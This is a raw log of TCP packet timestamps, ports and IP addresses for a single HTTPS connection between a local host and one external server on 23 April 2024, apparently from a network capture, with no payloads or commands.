Apr 23, 2024 21:44:05.529119015 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.529198885 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.533196926 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.533241034 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.533304930 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.533317089 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.533435106 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.537584066 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.537602901 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.537664890 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.537677050 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.537806988 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.542262077 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.542280912 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.542342901 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.542355061 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.542717934 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.546222925 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.546247005 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.546312094 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.546324015 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.546439886 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.550216913 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.550237894 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.550307035 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.550318956 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.550359964 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.550359964 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.555000067 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.555018902 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.555078030 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.555089951 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.555203915 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.558803082 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.558825016 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.558901072 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.558913946 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.559396029 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.562633991 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.562653065 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.562695980 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.562709093 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.562752962 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.562752962 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.566391945 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.566411018 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.566472054 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.566483021 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.566596031 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.570909977 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.570928097 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.570990086 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.571007013 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.571450949 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.574615002 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.574659109 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.574719906 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.574732065 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.574876070 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.578198910 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.578216076 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.578283072 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.578294039 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.578425884 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.582777023 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.582798004 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.582863092 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.582876921 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.583193064 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.592200994 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.592220068 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.592315912 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.592374086 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.592390060 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.592525005 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.592938900 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.592972994 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.593005896 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.593015909 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.593065023 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.593065023 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.597062111 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.597090960 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.597136021 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.597141027 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.597182035 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.597182035 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.600428104 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.600447893 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.600490093 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.600500107 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.600538969 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.600538969 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.603689909 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.603708982 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.603770971 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.603785992 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.604597092 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.607711077 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.607739925 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.607777119 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.607785940 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.607826948 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.607826948 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.610872984 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.610903978 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.610935926 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.610944986 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.610986948 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.610986948 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.614186049 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.614209890 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.614253044 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.614262104 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.614303112 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.614303112 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.617347002 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.617363930 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.617424965 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.617434978 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.617580891 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.621665955 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.621699095 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.621733904 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.621745110 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.621784925 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.621784925 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.624845982 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.624864101 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.624919891 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.624929905 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.625061989 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.627985954 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.628004074 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.628065109 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.628074884 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.628568888 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.630822897 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.630841017 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.630893946 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.630913973 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.630947113 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.630947113 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.634443045 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.634460926 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.634514093 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.634524107 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.634553909 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.634553909 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.637398005 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.637434959 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.637466908 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.637476921 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.637518883 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.637518883 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.640326977 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.640343904 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.640386105 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.640396118 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.640438080 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.640438080 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.643280983 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.643306971 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.643343925 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.643357992 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.643393040 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.643393040 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.646945000 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.646986008 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.647030115 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.647039890 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.647079945 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.647079945 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.649593115 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.649611950 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.649655104 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.649667025 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.649703979 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.649703979 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.652370930 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.652390003 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.652436018 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.652446032 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.652487040 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.652487040 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.655149937 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.655169010 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.655222893 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.655235052 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.655375004 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.658754110 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.658786058 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.658838034 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.658850908 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.658879995 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.658900023 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.661344051 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.661365032 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.661426067 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.661431074 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.661462069 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.664084911 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.664096117 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.664196014 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.664201975 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.664252043 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.667529106 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.667563915 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.667607069 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.667612076 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.667640924 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.670209885 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.670228958 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.670293093 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.670298100 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.670308113 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.670331955 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.672622919 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.672641993 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.672686100 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.672691107 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.672719002 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.672734976 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.675203085 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.675226927 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.675265074 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.675271034 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.675292969 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.675309896 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.678525925 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.678558111 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.678606033 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.678611994 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.678654909 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.681129932 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.681149960 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.681199074 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.681204081 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.681229115 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.681246996 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.683449030 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.683473110 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.683532953 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.683538914 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.683578968 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.686749935 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.686783075 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.686826944 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.686831951 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.686866045 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.686891079 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.689229012 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.689260006 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.689306021 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.689310074 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.689337015 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.689354897 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.691787958 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.691811085 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.691863060 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.691868067 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.691901922 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.694181919 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.694221973 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.694369078 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.694372892 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.694417000 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.697644949 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.697668076 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.697729111 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.697734118 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.697768927 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.699780941 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.699804068 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.699861050 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.699865103 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.699901104 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.702881098 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.702908039 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.702945948 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.702950954 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.702976942 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.702991962 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.706198931 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.706221104 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.706279039 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.706284046 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.706316948 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.709392071 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.709456921 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.709481955 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.709486961 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.709511995 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.709532976 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.710944891 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.710971117 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.711002111 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.711007118 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.711044073 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.713723898 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.713743925 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.713799000 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.713804007 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.713840008 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.715327024 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.715348959 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.715390921 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.715394020 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.715414047 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.715432882 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.718769073 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.718787909 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.718856096 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.718861103 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.718894958 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.721584082 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.721617937 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.721651077 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.721657038 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.721683979 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.721704960 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.723306894 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.723335981 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.723371029 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.723375082 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.723412991 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.725791931 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.725814104 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.725874901 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.725881100 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.725919008 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.728424072 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.728450060 CEST	443	49713	95.217.244.99	192.168.2.6
